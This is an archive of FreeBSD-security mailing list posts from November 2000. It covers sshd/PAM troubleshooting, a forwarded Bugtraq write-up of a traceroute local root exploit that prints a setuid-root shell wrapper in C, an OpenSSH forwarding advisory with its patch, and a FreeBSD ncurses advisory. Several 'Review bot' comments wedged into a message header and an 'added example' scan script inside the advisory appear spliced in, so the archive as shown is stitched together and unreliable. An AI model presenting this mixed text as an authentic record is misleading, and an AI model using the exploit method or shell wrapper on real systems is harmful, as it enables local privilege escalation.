From owner-freebsd-security Sun Nov 12 0:18:21 2000
From: Dmitry Achaev
To: "'security@FreeBSD.ORG'"
Subject: Re: sshd error's (new at this)
Date: Sun, 12 Nov 2000 14:19:17 -0000

>Okay so I want to have a machine be accessible only by ssh 2 and OpenSSH has
>the license that works for my company. I tried to load the OpenSSH that
>came with 4.1.1 port's but it said that I needed openssl installed. OpenSSL
>was supposedly in the system and it would not install from the ports. So I
>removed it and installed the newest OpenSSL (.9 something), no problems with
>that. I then installed OpenSSH 2.3 (portable) and as far as I can see it
>installed fine. So when I try to ssh as root to my own machine I get the
>following :
>
>Nov 10 10:41:54 bsd sshd[221]: no modules loaded for 'sshd' service
>Nov 10 10:41:54 bsd sshd[221]: no modules loaded for 'sshd' service
>Nov 10 10:41:54 bsd sshd[221]: no modules loaded for 'sshd' service
>Nov 10 10:41:54 bsd sshd[221]: fatal: PAM session setup failed[6]: Permission denied
>Nov 10 10:41:54 bsd sshd[221]: fatal: PAM session setup failed[6]: Permission denied
>Nov 10 10:41:54 bsd sshd[221]: fatal: PAM session setup failed[6]: Permission denied
>Nov 10 10:41:54 bsd sshd[221]: no modules loaded for 'sshd' service
>Nov 10 10:41:54 bsd sshd[221]: no modules loaded for 'sshd' service
>Nov 10 10:41:54 bsd sshd[221]: no modules loaded for 'sshd' service
>
>Thanks in advance for any help,
> Carlos Andrade
>----
>Carlos A. Andrade
>IS Manager
>RJS Technologies
>915.845.5228 ext 13 915.845.2119 fax
>carlos@rjstech.com

Most likely that you have a problem with /etc/pam.conf. In
openssh2.3.xxx/contrib you can see a file sshd.pam.freebsd.

>man pam.conf also good idea.
------
Dmitry Achaev
System Administrator
Omsk-Bank
adg@bankom.omsk.su

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Sun Nov 12 20:48:44 2000
Date: Sun, 12 Nov 2000 22:48:40 -0600
From: Doug McLaren
To: FreeBSD-security@FreeBSD.org
Subject: subscribe

subscribe

From owner-freebsd-security Mon Nov 13 10:44:51 2000
From: Cy Schubert - ITSD Open Systems Group
To: freebsd-security@freebsd.org
Subject: Re: [MSY] Local root exploit in LBNL traceroute - Part 2 (fwd)
Date: Mon, 13 Nov 2000 10:43:25 -0800

Do we need to concern ourselves about this? Traceroute in -stable is 1.3.2.

Regards,                       Phone:  (250)387-8437
Cy Schubert                    Fax:  (250)387-5766
Team Leader, Sun/DEC Team      Internet:  Cy.Schubert@osg.gov.bc.ca
Open Systems Group, ITSD, ISTA
Province of BC

------- Forwarded Message
[headers removed]

Date: Sun, 12 Nov 2000 20:16:45 +0100
From: Michel Kaempf
Subject: Re: [MSY] Local root exploit in LBNL traceroute - Part 2
To: BUGTRAQ@SECURITYFOCUS.COM

---------------[ MasterSecuritY ]---------------
-----------[ Local root exploit in LBNL traceroute - Part 2 ]-----------
----------[ By Michel "MaXX" Kaempf ]----------

--[ 0x00 - Table of contents ]------------------------------------------

0x01 - Brief summary
0x02 - Updating the exploit
0x03 - The exploit versus Non-executable user stack area
0x04 - The exploit versus PaX
0x05 - Credits

--[ 0x01 - Brief summary ]----------------------------------------------

The first part of this advisory, available at:

ftp://maxx.via.ecp.fr/traceroot/advisory

described a known vulnerability in traceroute and a portable way of
exploiting the problem. However, the first version of the exploit
contained minor imperfections, and could not work against systems
protected by the Linux kernel patches from the Openwall Project or the
PaX Team. These three issues are discussed in this second part of the
advisory.

--[ 0x02 - Updating the exploit ]---------------------------------------

The new version of the traceroute exploit is available at:

ftp://maxx.via.ecp.fr/traceroot/traceroot2.c

Two minor imperfections were fixed:

- The memory address of the function pointer overwritten by the exploit,
  __free_hook, was part of the arch structure in the first version.
  However, this address will not necessarily be the same on two different
  computers running the very same operating system. This memory address
  was removed from the arch structure, and is now provided by the user
  thanks to the new victim command line argument.

- The first version of the exploit was unable to detect null bytes in the
  structures it built.
The new version of the exploit will return an error if null bytes are
found. A workaround exists: the structures can be split into many pieces,
allowing null bytes thanks to the string terminators of the command line
arguments passed to traceroute. However, the case where null bytes were
present, and where no other valid victim could be chosen was never
encountered, and that is why the workaround was not implemented.

Moreover, "Red Hat Linux release 6.2 (traceroute 1.4a5) i386" support was
added. Thanks to fish stiqz, teleh0r and Ady Wicaksono.

--[ 0x03 - The exploit versus Non-executable user stack area ]----------

The first version of the exploit could not work against systems protected
by the Linux kernel patch from the Openwall Project (a.k.a. Solar Designer
non-executable stack patch), available at:

http://www.openwall.com/linux/

Thanks to Alex Khanin for notifying the problem.

An exploit against i386 patched systems, which stores the shellcode in the
heap instead of the stack, was written and is available at:

ftp://maxx.via.ecp.fr/traceroot/openwall.c

Following the example of the regular version of the traceroute exploit,
the exploit against patched systems requires a few adjustments:

- filename: the full path where the suid traceroute binary can be found.

- p: the pointer returned to the savestr() function by the malloc(1024)
  call. Check out the first part of the advisory for more information.

- victim: the memory address where the function pointer overwritten by
  the exploit is stored. __free_hook is not a good choice on patched
  systems, as its most significant byte is null. The dynamic relocation
  record of the free() function is a better choice:

  % objdump -R /usr/sbin/traceroute | grep free
  0804c88c R_386_JUMP_SLOT   free

- program: the program executed after successful exploitation of
  traceroute.
  "/bin/sh" is a possibility, but "/tmp/sh" is another one:

  % cat /tmp/sh.c
  #include
  int main() {
      char * argv[] = { "/bin/sh", NULL };
      setuid( 0 );
      setgid( 0 );
      execve( argv[0], argv, NULL );
      return( -1 );
  }

--[ 0x04 - The exploit versus PaX ]-------------------------------------

The exploit will lose the fight. The return-into-libc technique, or any
other technique virtually possible against PaX, will not work against
traceroute. The PaX patch is available at:

http://pageexec.virtualave.net/

When the exploit overwrites the pointer stored at the memory address foo
with the pointer bar, it also overwrites the pointer stored at the memory
address bar with the pointer foo (not exactly, two offsets are involved in
this process, check out the first part of the advisory, or the unlink()
macro used by free(), for more information). This is why a rwx memory page
is needed, and (un)fortunately, PaX removes these pages.

--[ 0x05 - Credits ]----------------------------------------------------

Again, thanks to Pekka Savola, Chris Evans, Dvorak and Solar Designer.

Thanks to Alex Khanin, Eugene Tsyrklevich, fish stiqz, teleh0r, Ady
Wicaksono, Matthias Eckermann, Pierre Mondie, Samuel Hocevar and Olivier
Thereaux.

And thanks to the Securite.Org Team, for providing the best (french)
security web site in the world. Check out:

http://www.securite.org/

--
Michel "MaXX" Kaempf

------- End of Forwarded Message

From owner-freebsd-security Mon Nov 13 14:19:13 2000
Date: Mon, 13 Nov 2000 14:18:53 -0800
From: Kris Kennaway
To: Cy Schubert - ITSD Open Systems Group
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: [MSY] Local root exploit in LBNL traceroute - Part 2 (fwd)

On Mon, Nov 13, 2000 at 10:43:25AM -0800, Cy Schubert - ITSD Open Systems Group wrote:
> Do we need to concern ourselves about this? Traceroute in -stable is
> 1.3.2.

It's discussion of an old (well, old in internet time, about a month or so
ago) exploit in a later version of traceroute than we have (1.4.x). FreeBSD
not vulnerable.
Kris

From owner-freebsd-security Mon Nov 13 14:46:57 2000
From: "Nuno Teixeira"
Subject: PPP NAT Gateway security
Date: Mon, 13 Nov 2000 22:50:05 -0000

Hello to all,

Recently I configured a FreeBSD box to act like a gateway so my NT
workstation computers at my office have access to the Internet. I
configured it in this way:

ppp -background -nat MYISP

It works OK and I have access to a lot of Internet services.

My question is: do I need to configure this machine with a firewall, so I
can protect my internal network from the outside net? If I need so, please
tell me a good place to start with firewalls for FreeBSD.

Thanks very much,

Nuno Teixeira

From owner-freebsd-security Mon Nov 13 15: 1:55 2000
From: Cy Schubert - ITSD Open Systems Group
To: freebsd-security@freebsd.org
Subject: OpenSSH Security Advisory (adv.fwd) (fwd)
Date: Mon, 13 Nov 2000 15:00:48 -0800

Would it be possible to apply the patch in the following advisory before
4.2 is released?

Regards,                       Phone:  (250)387-8437
Cy Schubert                    Fax:  (250)387-5766
Team Leader, Sun/DEC Team      Internet:  Cy.Schubert@osg.gov.bc.ca
Open Systems Group, ITSD, ISTA
Province of BC

------- Forwarded Message
[headers removed]

Date: Mon, 13 Nov 2000 21:13:18 +0100
From: Markus Friedl
Subject: OpenSSH Security Advisory (adv.fwd)
To: BUGTRAQ@SECURITYFOCUS.COM

Hostile servers can force OpenSSH clients to do agent or X11 forwarding

1. Systems affected:

   All versions of OpenSSH prior to 2.3.0 are affected.

2. Description:

   If agent or X11 forwarding is disabled in the ssh client
   configuration, the client does not request these features during
   session setup. This is the correct behaviour.

   However, when the ssh client receives an actual request asking for
   access to the ssh-agent, the client fails to check whether this
   feature has been negotiated during session setup. The client does
   not check whether the request is in compliance with the client
   configuration and grants access to the ssh-agent.

   A similar problem exists in the X11 forwarding implementation.

3. Impact:

   Hostile servers can access your X11 display or your ssh-agent.

4. Short Term Solution:

   Clear both the $DISPLAY and the $SSH_AUTH_SOCK variable before
   connecting to untrusted hosts:

   % unset SSH_AUTH_SOCK; unset DISPLAY; ssh host

5. Solution:

   Upgrade to OpenSSH-2.3.0 or apply the attached patch.
   OpenSSH-2.3.0 is available from www.openssh.com.

6. Credits:

   Thanks to Jacob Langseth for pointing out the X11 forwarding issue.

Appendix: Patch against openssh-2.2.0

- --- /openssh-2.2.0/clientloop.c Sun Aug 20 00:21:19 2000 +++ ssh/clientloop.c Fri Nov 10 13:54:42 2000 @@ -32,6 +32,8 @@ #include "buffer.h" #include "bufaux.h" +extern Options options; + /* Flag indicating that stdin should be redirected from /dev/null. */ extern int stdin_null_flag; @@ -750,7 +752,6 @@ int client_loop(int have_pty, int escape_char_arg, int ssh2_chan_id) { - - extern Options options; double start_time, total_time; int len; char buf[100];
@@ -993,7 +994,7 @@ debug("client_input_channel_open: ctype %s rchan %d win %d max %d", ctype, rchan, rwindow, rmaxpack); - - if (strcmp(ctype, "x11") == 0) { + if (strcmp(ctype, "x11") == 0 && options.forward_x11) { int sock; char *originator; int originator_port; @@ -1066,11 +1067,14 @@ dispatch_set(SSH_MSG_CHANNEL_OPEN_CONFIRMATION, &channel_input_open_co nfirmation); dispatch_set(SSH_MSG_CHANNEL_OPEN_FAILURE, &channel_input_open_failure ); dispatch_set(SSH_MSG_PORT_OPEN, &channel_input_port_open); - - dispatch_set(SSH_SMSG_AGENT_OPEN, &auth_input_open_request); dispatch_set(SSH_SMSG_EXITSTATUS, &client_input_exit_status); dispatch_set(SSH_SMSG_STDERR_DATA, &client_input_stderr_data); dispatch_set(SSH_SMSG_STDOUT_DATA, &client_input_stdout_data); - - dispatch_set(SSH_SMSG_X11_OPEN, &x11_input_open); + + dispatch_set(SSH_SMSG_AGENT_OPEN, options.forward_agent ? + &auth_input_open_request : NULL); + dispatch_set(SSH_SMSG_X11_OPEN, options.forward_x11 ? + &x11_input_open : NULL); } void client_init_dispatch_15()

------- End of Forwarded Message

From owner-freebsd-security Mon Nov 13 15:38:31 2000
Date: Mon, 13 Nov 2000 15:38:03 -0800
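Review bot: the file-scope `extern Options options;` added in the `@@ -32,6 +32,8 @@` hunk (with the matching local extern dropped from `client_loop()` in `@@ -750,7 +752,6 @@`) carries no comment saying why it moved; the dispatch-table setup further down now reads `options.forward_agent` and `options.forward_x11`, so a one-line note at the declaration would keep a later cleanup from pushing it back into `client_loop()` and breaking that code.

Review bot: the `&& options.forward_x11` guard in the `@@ -993,7 +994,7 @@` hunk lets an unrequested `x11` channel open fall through to the code after the `if` (not shown here) with nothing logged; a server opening an X11 channel the client never asked for is exactly the hostile behaviour this advisory describes, so an `error()`-level message next to the existing `debug()` call, e.g. `error("server requested X11 forwarding that was not negotiated");`, would make the attempt visible to the user and in logs instead of indistinguishable from a malformed request.

Review bot: the `NULL` entries installed by the `@@ -1066,11 +1067,14 @@` hunk for `SSH_SMSG_AGENT_OPEN` and `SSH_SMSG_X11_OPEN` depend on how the dispatcher treats an unset handler, which this patch does not show: if an unset entry is fatal, a hostile server gets a trivial way to drop the session, and if it is silently ignored the probe leaves no trace, so a small refusing handler that logs the unexpected request (and sends the usual `SSH_MSG_CHANNEL_OPEN_FAILURE` reply) would be the more defensive choice either way. Separately, the forwarded copy has mail-wrapped context lines (`&channel_input_open_co nfirmation` and `&channel_input_open_failure );`), so this hunk will not apply as pasted from the list; take the patch from the original advisory rather than from this message.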
From: Kris Kennaway
To: Cy Schubert - ITSD Open Systems Group
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: OpenSSH Security Advisory (adv.fwd) (fwd)

On Mon, Nov 13, 2000 at 03:00:48PM -0800, Cy Schubert - ITSD Open Systems Group wrote:
> Would it be possible to apply the patch in the following advisory
> before 4.2 is released?

Should be.

Kris

From owner-freebsd-security Mon Nov 13 15:55:37 2000
From: FreeBSD Security Advisories
To: FreeBSD Security Advisories
Subject: FreeBSD Security Advisory: FreeBSD-SA-00:68.ncurses
Date: Mon, 13 Nov 2000 15:54:53 -0800 (PST)

=============================================================================
FreeBSD-SA-00:68                                            Security Advisory
                                                                FreeBSD, Inc.

Topic:          ncurses allows local privilege escalation

Category:       core
Module:         ncurses
Announced:      2000-11-13
Affects:        FreeBSD 5.0-CURRENT, 4.x prior to the correction date.
                FreeBSD 3.x vulnerability status currently unconfirmed.
Corrected:      2000-10-11 (FreeBSD 4.1.1-STABLE)
Credits:        Jouko Pynnonen
FreeBSD only:   NO

I.   Background

ncurses is a text-mode display library used for formatting the output of
applications on a variety of terminals. It is externally maintained,
contributed code which is included in FreeBSD by default.

II.  Problem Description

There exists an overflowable buffer in the libncurses library in the
processing of cursor movement capabilities. An attacker can force a
privileged application to use the attacker's termcap file containing a
specially crafted terminal entry, which will trigger the vulnerability
when the vulnerable ncurses code is called. This allows them to execute
arbitrary code on the local system with the privileges of the exploited
binary.

The systat utility included in the FreeBSD base system is known to use
vulnerable ncurses routines. It runs with increased privileges as a
member of the kmem group, which allows it to read from kernel memory (but
not write to it). A process with the ability to read from kernel memory
can monitor privileged data such as network traffic, disk buffers and
terminal activity, and may be able to leverage this to obtain further
privileges on the local system or on other systems, including root
privileges.
There may be other vulnerable applications included in the FreeBSD 4.x
base system, but no others are confirmed to be vulnerable due to the
difficulty in identifying a complete list of vulnerable ncurses
functions. However the following is a complete list of FreeBSD system
binaries which link against ncurses and run with increased privileges.
They may or may not be vulnerable to exploitation.

/usr/sbin/lpc
/usr/bin/top
/usr/bin/systat

FreeBSD 3.x and earlier versions use a very old, customized version of
ncurses which is difficult to update without breaking
backwards-compatibility. The update was made for FreeBSD 4.0, but 3.x
will not be updated to the newer version. At this stage the vulnerability
has not been confirmed in FreeBSD 3.x.

III. Impact

Certain setuid/setgid software (including FreeBSD base system utilities
and third party ports/packages) may be vulnerable to a local exploit
yielding privileged access. The /usr/bin/systat utility is known to be
vulnerable to this problem in ncurses. At this time it is unknown whether
/usr/bin/top and /usr/sbin/lpc are also affected.

The problems were corrected prior to the release of FreeBSD 4.2.

IV.  Workaround

It is not feasible to reliably detect binaries which are vulnerable to
the ncurses vulnerability, however the provided utility will scan for
privileged binaries which use ncurses and which may potentially be
vulnerable. Some of the binaries reported may not in fact be vulnerable,
but should be recompiled anyway for maximum assurance of security.

Statically linked binaries which are identified as potentially vulnerable
should be recompiled from source code if possible, after patching and
recompiling libncurses, in order to correct the vulnerability.
Dynamically linked binaries will be corrected by simply patching and
recompiling libncurses as described below.
As an interim measure, consider removing any identified setuid or setgid
binary, removing set[ug]id privileges from the file, or limiting the file
access permissions, as appropriate. Of course, it is possible that some
of the identified files may be required for the correct operation of your
local system, in which case there is no clear workaround except for
limiting the set of users who may run the binaries, by an appropriate use
of user groups and removing the "o+x" file permission bit.

1) Download the 'scan_ncurses.sh' and 'test_ncurses.sh' scripts from

ftp://ftp.freebsd.org/pub/FreeBSD/CERT/tools/SA-00:68/scan_ncurses.sh
ftp://ftp.freebsd.org/pub/FreeBSD/CERT/tools/SA-00:68/test_ncurses.sh

e.g. with the fetch(1) command:

# fetch ftp://ftp.freebsd.org/pub/FreeBSD/CERT/tools/SA-00:68/scan_ncurses.sh
Receiving scan_ncurses.sh (381 bytes): 100%
381 bytes transferred in 0.1 seconds (7.03 kBps)
# fetch ftp://ftp.freebsd.org/pub/FreeBSD/CERT/tools/SA-00:68/test_ncurses.sh
Receiving test_ncurses.sh (604 bytes): 100%
604 bytes transferred in 0.1 seconds (6.55 kBps)

2) Verify the md5 checksums and compare to the value below:

# md5 scan_ncurses.sh
MD5 (scan_ncurses.sh) = 597f63af701253f053581aa1821cbac1
# md5 test_ncurses.sh
MD5 (test_ncurses.sh) = 12491ceb15415df7682e3797de53223e

3) Run the scan_ncurses.sh script against your system:

# chmod a+x ./test_ncurses.sh
# sh scan_ncurses.sh ./test_ncurses.sh /

This will scan your entire system for setuid or setgid binaries which
make use of the ncurses library. Each returned binary should be examined
(e.g. with 'ls -l' and/or other tools) to determine what security risk it
poses to your local environment, e.g. whether it can be run by arbitrary
local users who may be able to exploit it to gain privileges.

4) Remove the binaries, or reduce their file permissions, as appropriate.

V.   Solution

Upgrade your vulnerable FreeBSD system to 4.1.1-STABLE after the
correction date, or patch your present system source code and rebuild.
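The scan that section IV describes, written out as an added example; this is not the advisory's own scan_ncurses.sh/test_ncurses.sh (their contents are not reproduced on this page). It assumes only POSIX sh, find(1) and grep(1), and classifies by string content so that it never executes or ldd(1)s the binaries it inspects.

```shell
#!/bin/sh
# Added example, not the advisory's scripts: walk a tree for setuid/setgid
# files and report the ones that appear to use ncurses. Run as root so that
# every file is readable.
#
# Classification is by byte content only (grep -a), so a candidate binary
# is never executed and ldd(1), which can run code from the file it
# inspects, is not used:
#   "libncurses" in the file -> DT_NEEDED string of a dynamically linked
#                               binary (fixed by rebuilding libncurses)
#   "_nc_" in the file       -> ncurses-internal symbol names, as found in
#                               a statically linked, unstripped binary
#                               (must itself be recompiled after the fix)
# A stripped static binary carries neither marker and is missed, which is
# the "not feasible to reliably detect" caveat of section IV.

# ncurses_link_kind FILE -> prints "dynamic", "static" or "none"
ncurses_link_kind() {
    if grep -aq 'libncurses' "$1" 2>/dev/null; then
        echo dynamic
    elif grep -aq '_nc_' "$1" 2>/dev/null; then
        echo static
    else
        echo none
    fi
}

# scan_privileged_ncurses ROOT -> one line per suspect file:
#   <path>	<setuid|setgid|setuid+setgid>	<dynamic|static>
# Files that are not privileged, or show no ncurses marker, are skipped.
scan_privileged_ncurses() {
    find "$1" -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null |
    while IFS= read -r f; do
        kind=$(ncurses_link_kind "$f")
        [ "$kind" = none ] && continue
        bits=
        [ -u "$f" ] && bits=setuid
        if [ -g "$f" ]; then
            bits="${bits:+$bits+}setgid"
        fi
        printf '%s\t%s\t%s\n' "$f" "$bits" "$kind"
    done
}

# Usage: sh scan.sh /    (prints nothing when no suspect binary is found)
if [ -n "$1" ]; then
    scan_privileged_ncurses "$1"
fi
```

Each reported path still needs the manual look the advisory asks for (who can run it, whether it is in the list above); static hits must be rebuilt, dynamic ones are covered by rebuilding libncurses.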
Then run the scan_ncurses.sh script as instructed in section IV and
identify any statically-linked binaries as reported by the script. These
should either be removed, recompiled, or have privileges restricted to
secure them against this vulnerability (since statically-linked binaries
will not be affected by simply recompiling the shared libncurses
library).

To patch your present system: download the updated ncurses code from the
below location, and execute the following commands as root:

# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-00:68/ncurses.tar.gz
# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-00:68/ncurses.tar.gz.asc

Verify the detached PGP signature using your PGP utility.

cd /usr/src
tar xvfz /path/to/ncurses.tar.gz
cd /usr/src/lib/libncurses
make all
make install

In contrast to the usual practise, a simple patch fixing the security
vulnerability is not provided because the vendor did not make one
available, and the updated ncurses snapshot which fixed the vulnerability
contains numerous other changes whose purpose and relation to the fix was
unclear.

From owner-freebsd-security Mon Nov 13 16:11:43 2000
From: "Carlos Andrade"
Subject: more pestering from the newbie
Date: Mon, 13 Nov 2000 17:09:41 -0700

I did a clean install (again) of FreeBSD 4.1.1.1 and wanted to work on
OpenSSH. When I go to /usr/ports/security/openssh and do
:make install
it states that OpenSSH needs the openssl library

so I go to /usr/ports/security/openssl
:make install
the system reports that Openssl is already in the base system

So what is the deal? I installed all the ports and added lynx and bash.
That and configuring tcp_wrappers. Nothing else. Why am I getting this
error?

my thanks in advance,
Carlos Andrade
----
Carlos A. Andrade
IS Manager
RJS Technologies
915.845.5228 ext 13 915.845.2119 fax
carlos@rjstech.com

From owner-freebsd-security Mon Nov 13 16:23:42 2000
Date: Mon, 13 Nov 2000 16:23:23 -0800
From: Erick Mechler To: Carlos Andrade Cc: security@FreeBSD.ORG Subject: Re: more pestering from the newbie Message-ID: <20001113162323.C50021@lucifer.techometer.net> References: <000a01c04dcf$30149c40$fadef9ce@copyco.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <000a01c04dcf$30149c40$fadef9ce@copyco.com>; from Carlos Andrade on Mon, Nov 13, 2000 at 05:09:41PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org If you're running 4.1.1 then OpenSSL and OpenSSH are installed into the base system, as the error message states. You shouldn't have to install any ports to get either Open{SSL,SSH} to work. ssh is in /usr/bin/ssh; openssl is in /usr/bin/openssl. --Erick At Mon, Nov 13, 2000 at 05:09:41PM -0700, Carlos Andrade said this: :: I did a clean install (again) of FreeBSD 4.1.1.1 and wanted to work on :: OpenSSH. When I goto /usr/ports/security/openssh and do :: :make install :: it states that OpenSSH needs the openssl library :: :: so I go to /usr/ports/security/openssl :: :make install :: the system reports that Openssl is already in the base system :: :: So what is the deal? I installed all the ports and added lynx and bash. :: That and configuring tcp_wrappers. Nothing else. Why am I getting this :: error? :: :: my thanks in advance, :: Carlos Andrade :: ---- :: Carlos A. 
:: Andrade
:: IS Manager
:: RJS Technologies
:: 915.845.5228 ext 13 915.845.2119 fax
:: carlos@rjstech.com

From owner-freebsd-security Mon Nov 13 16:31:08 2000
Received: from sunny.fishnet.com (sunny.fishnet.com [209.150.200.6]) by hub.freebsd.org (Postfix) with ESMTP id DE0EC37B479 for ; Mon, 13 Nov 2000 16:31:03 -0800 (PST)
Received: from walleye.corp.fishnet.com (209.150.192.114) by sunny.fishnet.com (5.0.048) id 39FECC320033D041; Mon, 13 Nov 2000 18:30:55 -0600
Message-ID:
From: "Hudson, Henrik H."
To: "'carlos@rjstech.com'"
Cc: "'security@freebsd.org'"
Subject: RE: more pestering from the newbie
Date: Mon, 13 Nov 2000 18:32:22 -0600
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"

I may be wrong, but you need to install the security libraries on install (or CVS them down), which are in part made up of the openssl libraries?

---
Henrik Hudson

> -----Original Message-----
> From: owner-freebsd-security@FreeBSD.ORG
> [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Carlos Andrade
> Sent: Monday, November 13, 2000 18:10
> To: security@FreeBSD.ORG
> Subject: more pestering from the newbie
>
> I did a clean install (again) of FreeBSD 4.1.1.1 and wanted to work on
> OpenSSH. When I goto /usr/ports/security/openssh and do
> :make install
> it states that OpenSSH needs the openssl library
>
> so I go to /usr/ports/security/openssl
> :make install
> the system reports that Openssl is already in the base system
>
> So what is the deal? I installed all the ports and added
> lynx and bash.
> That and configuring tcp_wrappers. Nothing else. Why am I
> getting this
> error?
>
> my thanks in advance,
> Carlos Andrade
> ----
> Carlos A. Andrade
> IS Manager
> RJS Technologies
> 915.845.5228 ext 13 915.845.2119 fax
> carlos@rjstech.com

From owner-freebsd-security Mon Nov 13 17:04:09 2000
Received: from castle.dreaming.org (castle.dreaming.org [209.146.217.193]) by hub.freebsd.org (Postfix) with ESMTP id 70BF937B479 for ; Mon, 13 Nov 2000 17:04:04 -0800 (PST)
Received: from cr592943a (cr592943-a.bloor1.on.wave.home.com [24.156.38.199]) by castle.dreaming.org (8.11.1/8.11.1) with SMTP id eAE13mD24724; Mon, 13 Nov 2000 20:03:48 -0500 (EST) (envelope-from mit@mitayai.net)
From: "Will Mitayai Keeso Rowe"
To: "Erick Mechler", "Carlos Andrade"
Cc:
Subject: RE: more pestering from the newbie
Date: Mon, 13 Nov 2000 20:04:36 -0500
Message-ID:
MIME-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0)
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400
In-Reply-To: <20001113162323.C50021@lucifer.techometer.net>
Importance: Normal

It's actually also good to make sure that the ssh from ports is stopped and then uninstalled (pkg_delete; check /var/db/pkg/ for the package name), including /usr/local/etc/rc.d/ entries. Then update your sources and make world.

-Mit

-----Original Message-----
From: owner-freebsd-security@FreeBSD.ORG [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Erick Mechler
Sent: Monday, November 13, 2000 7:23 PM
To: Carlos Andrade
Cc: security@FreeBSD.ORG
Subject: Re: more pestering from the newbie

If you're running 4.1.1 then OpenSSL and OpenSSH are installed into the base system, as the error message states. You shouldn't have to install any ports to get either Open{SSL,SSH} to work. ssh is in /usr/bin/ssh; openssl is in /usr/bin/openssl.

--Erick

At Mon, Nov 13, 2000 at 05:09:41PM -0700, Carlos Andrade said this:
:: I did a clean install (again) of FreeBSD 4.1.1.1 and wanted to work on
:: OpenSSH. When I goto /usr/ports/security/openssh and do
:: :make install
:: it states that OpenSSH needs the openssl library
::
:: so I go to /usr/ports/security/openssl
:: :make install
:: the system reports that Openssl is already in the base system
::
:: So what is the deal? I installed all the ports and added lynx and bash.
:: That and configuring tcp_wrappers. Nothing else. Why am I getting this
:: error?
::
:: my thanks in advance,
:: Carlos Andrade
:: ----
:: Carlos A.
:: Andrade
:: IS Manager
:: RJS Technologies
:: 915.845.5228 ext 13 915.845.2119 fax
:: carlos@rjstech.com

From owner-freebsd-security Mon Nov 13 18:22:50 2000
Received: from lynx.aba.net.au (lynx.esec.com.au [203.21.84.1]) by hub.freebsd.org (Postfix) with SMTP id E3E2C37B4C5 for ; Mon, 13 Nov 2000 18:22:47 -0800 (PST)
Received: (qmail 26153 invoked from network); 14 Nov 2000 02:22:40 -0000
Received: from swun.esec.com.au (HELO eSec.com.au) (203.21.85.207) by lynx.esec.com.au with SMTP; 14 Nov 2000 02:22:40 -0000
Message-ID: <3A10A511.B890C921@eSec.com.au>
Date: Tue, 14 Nov 2000 13:36:01 +1100
From: Sam Wun
Organization: eSec
X-Mailer: Mozilla 4.74 [en] (X11; U; Linux 2.2.12 i386)
X-Accept-Language: en
MIME-Version: 1.0
Cc: security@FreeBSD.ORG
Subject: racoon -> isakmpd
References:
Content-Type: text/plain; charset=gb2312
Content-Transfer-Encoding: 7bit

Hi!

Does anyone have a FreeBSD box with racoon working together with an OpenBSD box with isakmpd as a VPN?

Our head office uses OpenBSD on their firewall and uses isakmpd for VPN. I want to use FreeBSD with racoon, but with no success.

Any working configs out there?

Thanks
Sam.

From owner-freebsd-security Mon Nov 13 18:24:20 2000
Received: from mail.epylon.com (sf-gw.epylon.com [63.93.9.98]) by hub.freebsd.org (Postfix) with ESMTP id B550B37B479 for ; Mon, 13 Nov 2000 18:24:17 -0800 (PST)
Received: by pluto.epylon.lan with Internet Mail Service (5.5.2650.21) id ; Mon, 13 Nov 2000 18:24:15 -0800
Message-ID: <657B20E93E93D4118F9700D0B73CE3EA02427F@goofy.epylon.lan>
From: Jason DiCioccio
To: 'Sam Wun'
Cc: security@FreeBSD.ORG
Subject: RE: racoon -> isakmpd
Date: Mon, 13 Nov 2000 18:24:12 -0800
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: multipart/mixed; boundary="----_=_NextPart_000_01C04DE1.FB2E3F0A"

I would be interested in this too if anyone knows

-------
Jason DiCioccio
Unix BOFH

mailto:jasond@epylon.com

415-593-2761 Direct & Fax
415-593-2900 Main

Epylon Corporation
645 Harrison Street, Suite 200
San Francisco, CA 94107
www.epylon.com

OK, so you're a Ph.D. Just don't touch anything.

-----Original Message-----
From: Sam Wun [mailto:swun@eSec.com.au]
Sent: Monday, November 13, 2000 6:36 PM
Cc: security@FreeBSD.ORG
Subject: racoon -> isakmpd

Hi!

Does anyone got a FreeBSD box with racoon working together with a OpenBSD box with isakmpd as a VPN?

Our headoffice uses OpenBSD on their firewall and uses isakmpd for VPN, I want to use FreeBSD with racoon but with no sucess.

Any working configs out there?

Thanks
Sam.

<< File: Jason DiCioccio.vcf >>

From owner-freebsd-security Mon Nov 13 18:25:29 2000
Received: from citusc17.usc.edu (citusc17.usc.edu [128.125.38.177]) by hub.freebsd.org (Postfix) with ESMTP id 56C8D37B479 for ; Mon, 13 Nov 2000 18:25:27 -0800 (PST)
Received: (from kris@localhost) by citusc17.usc.edu (8.11.1/8.11.1) id eAE2Qd912347; Mon, 13 Nov 2000 18:26:39 -0800 (PST) (envelope-from kris)
Date: Mon, 13 Nov 2000 18:26:38 -0800
From: Kris Kennaway
To: "Hudson, Henrik H."
Cc: "'carlos@rjstech.com'", "'security@freebsd.org'"
Subject: Re: more pestering from the newbie
Message-ID: <20001113182638.A12319@citusc17.usc.edu>
References:
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="fdj2RfSjLxBAspz7"
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: ; from hhudson@eschelon.com on Mon, Nov 13, 2000 at 06:32:22PM -0600

On Mon, Nov 13, 2000 at 06:32:22PM -0600, Hudson, Henrik H. wrote:
> I may be wrong, but you need to install the security libraries on install?
> or CVS them down?which are in part made up of the openssl libraries?

Nope, they're installed by default starting from 4.1.1

Kris

